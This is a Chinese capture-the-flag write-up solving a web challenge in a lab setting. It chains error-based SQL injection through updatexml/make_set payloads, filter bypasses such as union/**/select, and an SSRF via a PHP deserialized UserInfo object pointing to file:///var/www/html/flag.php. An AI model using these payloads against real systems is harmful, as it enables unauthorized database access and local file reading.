打卡之后

发现有login 还有join

先从login开始做起,发现登入界面,post 型 尝试一下抓包注入

右键copy to file 提取成 txt 文件 尝试无果

尝试扫描一下目录

尝试访问flag.php 无果 那就应该访问不到继续走

那就分析 join 首先 注册之后一点发现

/view.php?no=1

发现注入点

• ?no=1 and 1=1 正常
• ?no=1 and 1=2

出现报错信息,并暴露出路径

利用报错注入payload

1 and updatexml(1,concat(0x7e,(select group_conat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

发现出现这个,经测试 是过滤了0x7e 0x5e 等等 当然将0x7e 带换成’~'是可以的

-1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),1)--+

搜一些大佬解法是利用

1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

补充make_set: 简单的来说就是第一个参数将其转成二进制数并逆置 然后将后面的参数依次到对应的二进制位上,输出

然后就是提取列名

-1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)#

-1 and updatexml(1,make_set(3,'~',(select data from users)),1)#

发现是发序列化的数据,emm 就没思路了

后来知道是 查看robots.txt 得到备份文件

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();//初始化curl会话

        curl_setopt($ch, CURLOPT_URL, $url);//设置要抓去的url
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

发现是对url 的请求，并没有对url 进行任何的过滤 所以存在ssrf攻击

那末思路有了

利用反序列化 file:///命令对内容进行flag 请求

<?php
class UserInfo
{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";



}
$a = new UserInfo();
echo serialize($a);

判断出列数有4列 (从3开始试就完了 只有4正常),但是这里的union select 被过滤了

不知道试过滤的啥思路又断了 看大佬wp 是说没过滤完全:

构造:union/**/select 即可

最后payload

http://111.200.241.244:53194/view.php?no=-1%20%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:1:%221%22;s:3:%22age%22;i:0;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27

查看源码得flag